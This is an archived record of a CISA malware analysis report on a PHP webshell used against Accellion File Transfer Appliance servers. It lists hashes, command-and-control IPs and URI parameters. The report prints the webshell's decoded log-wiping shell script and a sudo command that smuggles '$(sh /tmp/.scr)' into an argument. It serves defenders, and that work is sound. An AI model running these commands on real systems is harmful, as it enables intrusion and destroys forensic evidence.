{
	"id": "1acfe385-cb00-4a94-9144-b6af41e2768b",
	"created_at": "2026-04-06T00:19:15.611866Z",
	"updated_at": "2026-04-10T13:11:28.979871Z",
	"deleted_at": null,
	"sha1_hash": "81de79bcb268a20bce9c617716203e7ac95912b0",
	"title": "MAR-10325064-1.v1 - Accellion FTA | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 80628,
	"plain_text": "MAR-10325064-1.v1 - Accellion FTA | CISA\r\nPublished: 2021-02-24 · Archived: 2026-04-05 17:36:01 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. 
Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) analyzes a malicious Hypertext Preprocessor (PHP) webshell file submitted to CISA\r\nfor analysis. The webshell is designed to be uploaded to an Accellion File Transfer Appliance (FTA) server, a secure file\r\ntransfer application used by customers to send large files. The webshell leverages a Structured Query Language (SQL)\r\ninjection vulnerability to install itself onto the impacted FTA server. The webshell provides threat actors with the ability to\r\nlocate files, obtain file metadata, and download files stored on the Accellion FTA server.\r\nThis webshell has been used in recent cyberattacks targeting users of Accellion FTA. For more information on these attacks,\r\nrefer to Joint Cybersecurity Advisory AA21-055A.\r\nFor a downloadable copy of IOCs, see: MAR-10325064-1.v1.stix.\r\nSubmitted Files (1)\r\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7 (about.html)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a\r\nPage 1 of 13\n\nIPs (9)\r\n155.94.160.40\r\n192.52.167.101\r\n194.88.104.24\r\n197.156.107.83\r\n209.163.151.232\r\n209.58.189.165\r\n45.135.229.179\r\n79.141.162.82\r\n92.38.135.29\r\nFindings\r\n2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nTags\r\nwebshell\r\nDetails\r\nName about.html\r\nSize 3202 bytes\r\nType PHP script, ASCII text, with very long lines\r\nMD5 bdfd11b1b092b7c61ce5f02ffc5ad55a\r\nSHA1 9bbaf89be60a5c455ae5b14cbead82fce22f3b66\r\nSHA256 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nSHA512 8e9e1fd5d1798b519bb477050b0e817be7523b92715958446d4133f97923a1a6dc726c7d7009da6ecd3bf674e88ae428a45300cbe8f4b362\r\nssdeep 96:jh58DD+hpmEr4YkPdvrf50ZPbAmLkysSJBLUNf++m:GahpmErBmZrfKVsrysSJBz\r\nEntropy 
5.641443\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\n2e0df09fa3... Related_To 209.58.189.165\r\n2e0df09fa3... Related_To 197.156.107.83\r\n2e0df09fa3... Related_To 194.88.104.24\r\n2e0df09fa3... Related_To 45.135.229.179\r\n2e0df09fa3... Related_To 92.38.135.29\r\n2e0df09fa3... Related_To 155.94.160.40\r\n2e0df09fa3... Related_To 209.163.151.232\r\n2e0df09fa3... Related_To 79.141.162.82\r\n2e0df09fa3... Related_To 192.52.167.101\r\nDescription\r\nThe file, about.html, is a malicious Hypertext Preprocessor (PHP) webshell which leverages a SQL injection vulnerability to\r\ninstall itself onto the compromised Accellion FTA server. When the webshell is successfully installed, it provides threat\r\nactors the ability to download files stored on the FTA server.\r\nAnalysis indicates that the FTA server was compromised, which allows the threat actor to craft an HTTP request\r\ndirectly to the webshell with commands that will be executed as if the threat actor had local (shell) access to the FTA server.\r\nWhen executed on the compromised FTA server, the webshell checks whether the HTTP request accessing this\r\nresource includes the parameters \"dwn\" and \"fn\" (Figure 2). If the two parameters are present in the HTTP request, then\r\nthe webshell uses the decrypt function to decrypt the contents of the original \"dwn\" parameter and stores the result in the variable\r\nnamed \"$path\". It performs the same process on the \"fn\" parameter and stores the value in the variable named \"$fname\". The\r\nwebshell checks if the file located at \"$path\" exists on the compromised FTA server. 
If the file exists, then the \"$path\" and\r\n\"$fname\" variables are used to call the readfile function to read and download the contents of the targeted file.\r\nNote: The encrypt and decrypt functions are undefined in the webshell; it is possible that both functions are defined in\r\none or both of the files referenced by the webshell, \"function.inc\" and \"remote.inc\".\r\nThe file checks if the HTTP request has the parameter \"csrftoken\" and the parameter has the value\r\n\"11454bd782bb41db213d415e10a0fb3c\" (Figure 3). If so, the webshell uses the clean_up function to delete itself from\r\nthe victim's system.\r\nThe clean_up function calls another function, file_put_contents. This function is used by the webshell to create the file\r\n\"/tmp/.scr\" and write the decoded contents of a base64-encoded string to it (Figure 4).\r\nDisplayed below are the decoded contents of the base64-encoded string:\r\n--Begin decoded contents within the base64 encoded string--\r\n#!/bin/sh\r\nfor log in `ls /var/opt/apache/*log*`;do cat $log 2\u003e/dev/null | grep -v 'about.html' \u003e /tmp/x;mv /tmp/x $log;rm -rf /tmp/x;done\r\necho -n \u003e /home/seos/log/adminpl.log;\r\nrm -rf /home/httpd/html/about.html \u003e /tmp/.out\r\nrm -rfv /home/httpd/html/oauth.api \u003e /tmp/.out\r\nchmod 777 /tmp/.out\r\nchown nobody:nobody /tmp/.out\r\necho \u003e /var/log/secure\r\n--End decoded contents within the base64 encoded string--\r\nThe decoded content, written to \"/tmp/.scr\", is a shell script used by the webshell to evade detection and analysis. The script is\r\ndesigned to iterate through all logs matching \"/var/opt/apache/*log*\" on the victim's system, keep only the lines that do not refer\r\nto about.html, and store them in \"/tmp/x\". This file is then used to replace the original log file before \"/tmp/x\" is removed\r\nfrom the victim's system. 
This will result in Apache logs that have been sterilized of references to about.html, which hinders\r\nlog analysis.\r\nThe script file will attempt to remove \"/home/seos/courier/about.html\" and \"/home/seos/courier/oauth.api\" from the victim's\r\nsystem. Once these files are removed, it redirects standard output to \"/tmp/.out\" before modifying that file's ownership and\r\npermissions, making it more difficult to recover and analyze.\r\nThe script file is executed by invoking the Perl system function, which is used for executing arbitrary Unix commands on a\r\nsystem. The admin.pl script is used to execute the script file.\r\nDisplayed below is the command used to execute the script file:\r\n--Begin command--\r\n@system('sudo /usr/local/bin/admin.pl --mount_cifs=AF,DF,\"\\'\\$(sh /tmp/.scr)\\'\",PASSWORD 1\u003e/dev/null 2\u003e/dev/null');\r\n--End command--\r\nThe script file \"/tmp/.scr\" and the output file \"/tmp/.out\" are later unlinked and deleted from the victim's system.\r\nIf the HTTP request does not match the parameters for downloading file contents (Figure 2) or performing the cleanup\r\nprocess (Figure 3), then the webshell expects to receive an application ID from the parameter aid obtained from the HTTP\r\nrequest (Figure 5). This application ID is used to open the associated database and execute a SQL command against it\r\n(Figure 6).\r\nThe cleanup mechanism is invoked to remove the webshell from the system and Apache logs only if the webshell returns no\r\nresults from the SQL query executed on the victim's system. If the webshell returns results from the SQL query executed on\r\nthe victim's system, then the results are returned to the webshell in a table (Figure 1). 
This technique allows the threat actor\r\nto manually download file contents or initiate the cleanup process by clicking on their respective links.\r\nDisplayed below are Indicators of Compromise (IOCs) related to this malicious webshell:\r\n--Begin file system artifacts contained in the webshell--\r\n/home/seos/courier/about.html\r\n/tmp/.scr\r\n/tmp/.out\r\n--End file system artifacts contained in the webshell--\r\n--Begin IP addresses--\r\n209.58.189.165\r\n197.156.107.83\r\n194.88.104.24\r\n45.135.229.179\r\n92.38.135.29\r\n155.94.160.40\r\n209.163.151.232\r\n79.141.162.82\r\n192.52.167.101\r\n--End IP addresses--\r\nThe URIs contain the following parameters (Figures 2 and 5):\r\n--Begin URI parameters--\r\ndwn\r\nfn\r\naid\r\n--End URI parameters--\r\nThe URIs contain the following parameter and its corresponding value (Figure 3):\r\n--Begin URI parameter and value--\r\nparameter: csrftoken\r\nvalue: 11454bd782bb41db213d415e10a0fb3c\r\n--End URI parameter and value--\r\nScreenshots\r\nFigure 1 - The webshell opened in a web browser. Note: The output shown differs substantially from what an FTA server would\r\nproduce, since the webshell was opened on a system without Accellion installed.\r\nFigure 2 - The webshell contains functionality used to download targeted files from the FTA server. The webshell verifies\r\nthat the HTTP request contains the parameters \"dwn\" and \"fn\" prior to downloading the targeted file.\r\nFigure 3 - The webshell checks if the HTTP request has the parameter \"csrftoken\" and a corresponding value\r\n\"11454bd782bb41db213d415e10a0fb3c\". 
If so, it uses the clean_up function to delete itself from the victim's system.\r\nFigure 4 - The webshell creates the script file \"/tmp/.scr\" and decodes an encoded base64 string contained in the script file.\r\nFigure 5 - The webshell uses the aid parameter to open associated database and execute a SQL command against it.\r\nFigure 6 - This is the SQL Command executed against the associated database.\r\n209.58.189.165\r\nTags\r\ncommand-and-control\r\nRelationships\r\n209.58.189.165 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n197.156.107.83\r\nTags\r\ncommand-and-control\r\nRelationships\r\n197.156.107.83 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n194.88.104.24\r\nTags\r\ncommand-and-control\r\nRelationships\r\n194.88.104.24 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n45.135.229.179\r\nTags\r\ncommand-and-control\r\nRelationships\r\n45.135.229.179 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n92.38.135.29\r\nTags\r\ncommand-and-control\r\nRelationships\r\n92.38.135.29 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n155.94.160.40\r\nTags\r\ncommand-and-control\r\nRelationships\r\n155.94.160.40 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n209.163.151.232\r\nTags\r\ncommand-and-control\r\nRelationships\r\n209.163.151.232 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n79.141.162.82\r\nTags\r\ncommand-and-control\r\nRelationships\r\n79.141.162.82 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\n192.52.167.101\r\nTags\r\ncommand-and-control\r\nRelationships\r\n192.52.167.101 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nDescription\r\nThe webshell attempts to connect to this IP address.\r\nRelationship Summary\r\n2e0df09fa3... Related_To 209.58.189.165\r\n2e0df09fa3... Related_To 197.156.107.83\r\n2e0df09fa3... Related_To 194.88.104.24\r\n2e0df09fa3... Related_To 45.135.229.179\r\n2e0df09fa3... Related_To 92.38.135.29\r\n2e0df09fa3... Related_To 155.94.160.40\r\n2e0df09fa3... Related_To 209.163.151.232\r\n2e0df09fa3... Related_To 79.141.162.82\r\n2e0df09fa3... 
Related_To 192.52.167.101\r\n209.58.189.165 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n197.156.107.83 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n194.88.104.24 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n45.135.229.179 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n92.38.135.29 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n155.94.160.40 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n209.163.151.232 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n79.141.162.82 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\n192.52.167.101 Related_To 2e0df09fa37eabcae645302d9865913b818ee0993199a6d904728f3093ff48c7\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. 
Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. 
To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a"
	],
	"report_names": [
		"ar21-055a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434755,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.pdf",
		"text": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.txt",
		"img": "https://archive.orkl.eu/81de79bcb268a20bce9c617716203e7ac95912b0.jpg"
	}
}